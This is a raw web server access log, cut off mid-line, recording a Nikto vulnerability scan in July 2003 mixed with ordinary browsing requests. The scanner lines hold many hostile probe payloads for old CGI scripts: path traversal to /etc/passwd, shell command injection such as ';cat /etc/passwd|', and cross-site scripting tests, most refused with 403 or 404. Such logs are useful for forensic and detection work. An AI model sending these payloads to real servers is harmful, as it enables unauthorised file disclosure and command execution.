"Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:56:59 +0900] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://ddd.ddd.ddd.ddd/php/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:56:59 +0900] "GET /icons/unknown.gif HTTP/1.1" 200 245 "http://ddd.ddd.ddd.ddd/php/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:00 +0900] "GET /cgi.cgi/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:01 +0900] "GET /cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:01 +0900] "GET /cgi.cgi/sh HTTP/1.0" 403 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:02 +0900] "GET /cgi-bin/sh HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:03 +0900] "GET /cgi.cgi/shop.cgi?page=../../../../../../../etc/passwd HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:03 +0900] "GET /cgi-bin/shop.cgi?page=../../../../../../../etc/passwd HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:04 +0900] "GET /cgi.cgi/shop.pl/page=;cat%20shop.pl| HTTP/1.0" 403 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:05 +0900] "GET /cgi-bin/shop.pl/page=;cat%20shop.pl| HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:06 +0900] "GET /cgi.cgi/shop/auth_data/auth_user_file.txt HTTP/1.0" 403 317 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:06 +0900] "GET /cgi-bin/shop/auth_data/auth_user_file.txt HTTP/1.0" 404 313 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:07 +0900] "GET /cgi.cgi/shop/orders/orders.txt HTTP/1.0" 403 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:07 +0900] "GET / HTTP/1.1" 200 3923 "http://ddd.ddd.ddd.ddd/php/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:08 +0900] "GET /cgi-bin/shop/orders/orders.txt HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:08 +0900] "GET /gpi/image/dot_a1.gif HTTP/1.1" 200 326 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:08 +0900] "GET /gpi/image/dot_b1.gif HTTP/1.1" 200 446 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:08 +0900] "GET /cgi.cgi/shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:09 +0900] "GET /gpi/image/english.gif HTTP/1.1" 200 1758 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:09 +0900] "GET /gpi/image/test4.jpg HTTP/1.1" 200 13912 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:09 +0900] "GET /gpi/image/staff.gif HTTP/1.1" 200 1584 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:09 +0900] "GET /cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:09 +0900] "GET /gpi/image/products.gif HTTP/1.1" 200 1792 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:10 +0900] "GET /gpi/image/a_report.gif HTTP/1.1" 200 2353 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:10 +0900] "GET /gpi/image/links.gif HTTP/1.1" 200 1578 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:10 +0900] "GET /gpi/image/wall01.gif HTTP/1.1" 200 3943 "http://ddd.ddd.ddd.ddd/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02" 212.92.77.254 - - [24/Jul/2003:01:57:10 +0900] "GET /cgi.cgi/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:11 +0900] "GET /cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:11 +0900] "GET /cgi.cgi/show.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:12 +0900] "GET /cgi-bin/show.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:13 +0900] "GET /cgi.cgi/showcheckins.cgi?person=<script>alert('Vulnerable')</script> HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:14 +0900] "GET /cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:14 +0900] "GET /cgi.cgi/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:15 +0900] "GET /cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:16 +0900] "GET /cgi.cgi/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:16 +0900] "GET /cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:17 +0900] "GET /cgi.cgi/spin_client.cgi?aaaaaaaa HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:18 +0900] "GET /cgi-bin/spin_client.cgi?aaaaaaaa HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:19 +0900] "GET /cgi.cgi/ss HTTP/1.0" 403 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:19 +0900] "GET /cgi-bin/ss HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:20 +0900] "GET /cgi.cgi/sscd_suncourier.pl HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:21 +0900] "GET /cgi-bin/sscd_suncourier.pl HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:21 +0900] "GET /cgi.cgi/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 400 406 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:22 +0900] "GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 400 406 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:23 +0900] "GET /cgi.cgi/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.0" 403 343 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:24 +0900] "GET /cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.0" 404 339 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:24 +0900] "GET /cgi.cgi/stat.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:25 +0900] "GET /cgi-bin/stat.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:26 +0900] "GET /cgi.cgi/stat/ HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:26 +0900] "GET /cgi-bin/stat/ HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:27 +0900] "GET /cgi.cgi/stats-bin-p/reports/index.html HTTP/1.0" 403 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:28 +0900] "GET /cgi-bin/stats-bin-p/reports/index.html HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:29 +0900] "GET /cgi.cgi/stats.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:29 +0900] "GET /cgi-bin/stats.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:30 +0900] "GET /cgi.cgi/stats.prf HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:31 +0900] "GET /cgi-bin/stats.prf HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:31 +0900] "GET /cgi.cgi/stats/ HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:32 +0900] "GET /cgi-bin/stats/ HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:33 +0900] "GET /cgi.cgi/statsconfig HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:34 +0900] "GET /cgi-bin/statsconfig HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:34 +0900] "GET /cgi.cgi/stats_old/ HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:35 +0900] "GET /cgi-bin/stats_old/ HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:36 +0900] "GET /cgi.cgi/statview.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:36 +0900] "GET /cgi-bin/statview.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:37 +0900] "GET /cgi.cgi/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:38 +0900] "GET /cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:39 +0900] "GET /cgi.cgi/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:39 +0900] "GET /cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:40 +0900] "GET /cgi.cgi/store/agora.cgi?page=whatever33.html HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:41 +0900] "GET /cgi-bin/store/agora.cgi?page=whatever33.html HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:41 +0900] "GET /cgi.cgi/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:42 +0900] "GET /cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:43 +0900] "GET /cgi.cgi/story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:44 +0900] "GET /cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:44 +0900] "GET /cgi.cgi/survey HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:45 +0900] "GET /cgi-bin/survey HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:46 +0900] "GET /cgi.cgi/survey.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:46 +0900] "GET /cgi-bin/survey.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:47 +0900] "GET /cgi.cgi/sws/admin.html HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:48 +0900] "GET /cgi-bin/sws/admin.html HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:49 +0900] "GET /cgi.cgi/tablebuild.pl HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:49 +0900] "GET /cgi-bin/tablebuild.pl HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:50 +0900] "GET /cgi.cgi/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:51 +0900] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:51 +0900] "GET /cgi.cgi/tcsh HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:52 +0900] "GET /cgi-bin/tcsh HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:53 +0900] "GET /cgi.cgi/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:54 +0900] "GET /cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:54 +0900] "GET /cgi.cgi/test-cgi.exe?<script>alert(document.cookie)</script> HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:55 +0900] "GET /cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:56 +0900] "GET /cgi.cgi/test-cgi?/* HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:56 +0900] "GET /cgi-bin/test-cgi?/* HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:57 +0900] "GET /cgi.cgi/test.cgi HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:58 +0900] "GET /cgi-bin/test.cgi HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:59 +0900] "GET /cgi.cgi/test/test.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:57:59 +0900] "GET /cgi-bin/test/test.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:00 +0900] "GET /cgi.cgi/testcgi.exe?<script>alert(document.cookie)</script> HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:01 +0900] "GET /cgi-bin/testcgi.exe?<script>alert(document.cookie)</script> HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:01 +0900] "GET /cgi.cgi/texis.exe/junk HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:02 +0900] "GET /cgi-bin/texis.exe/junk HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:03 +0900] "GET /cgi.cgi/texis/junk HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:04 +0900] "GET /cgi-bin/texis/junk HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:04 +0900] "GET /cgi.cgi/textcounter.pl HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:05 +0900] "GET /cgi-bin/textcounter.pl HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:06 +0900] "GET /cgi.cgi/tidfinder.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:06 +0900] "GET /cgi-bin/tidfinder.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:07 +0900] "GET /cgi.cgi/tigvote.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:08 +0900] "GET /cgi-bin/tigvote.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:09 +0900] "GET /cgi.cgi/title.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:09 +0900] "GET /cgi-bin/title.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:13 +0900] "GET /cgi.cgi/tpgnrock HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:14 +0900] "GET /cgi-bin/tpgnrock HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:14 +0900] "GET /cgi.cgi/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:15 +0900] "GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:16 +0900] "GET /cgi.cgi/troops.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:17 +0900] "GET /cgi-bin/troops.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:17 +0900] "GET /cgi.cgi/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:18 +0900] "GET /cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:19 +0900] "GET /cgi.cgi/ultraboard.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:19 +0900] "GET /cgi-bin/ultraboard.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:20 +0900] "GET /cgi.cgi/ultraboard.pl HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:21 +0900] "GET /cgi-bin/ultraboard.pl HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:22 +0900] "GET /cgi.cgi/unlg1.1 HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:22 +0900] "GET /cgi-bin/unlg1.1 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:23 +0900] "GET /cgi.cgi/unlg1.2 HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:24 +0900] "GET /cgi-bin/unlg1.2 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:24 +0900] "GET /cgi.cgi/update.dpgs HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:25 +0900] "GET /cgi-bin/update.dpgs HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:26 +0900] "GET /cgi.cgi/upload.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:27 +0900] "GET /cgi-bin/upload.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:27 +0900] "GET /cgi.cgi/Upload.pl HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:28 +0900] "GET /cgi-bin/Upload.pl HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:29 +0900] "GET /cgi.cgi/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:29 +0900] "GET /cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:30 +0900] "GET /cgi.cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:31 +0900] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:32 +0900] "GET /cgi.cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:32 +0900] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:33 +0900] "GET /cgi.cgi/view-source HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:34 +0900] "GET /cgi-bin/view-source HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:35 +0900] "GET /cgi.cgi/view-source?view-source HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:35 +0900] "GET /cgi-bin/view-source?view-source HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:36 +0900] "GET /cgi.cgi/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:37 +0900] "GET /cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:37 +0900] "GET /cgi.cgi/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>; HTTP/1.0" 403 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:38 +0900] "GET /cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>; HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:39 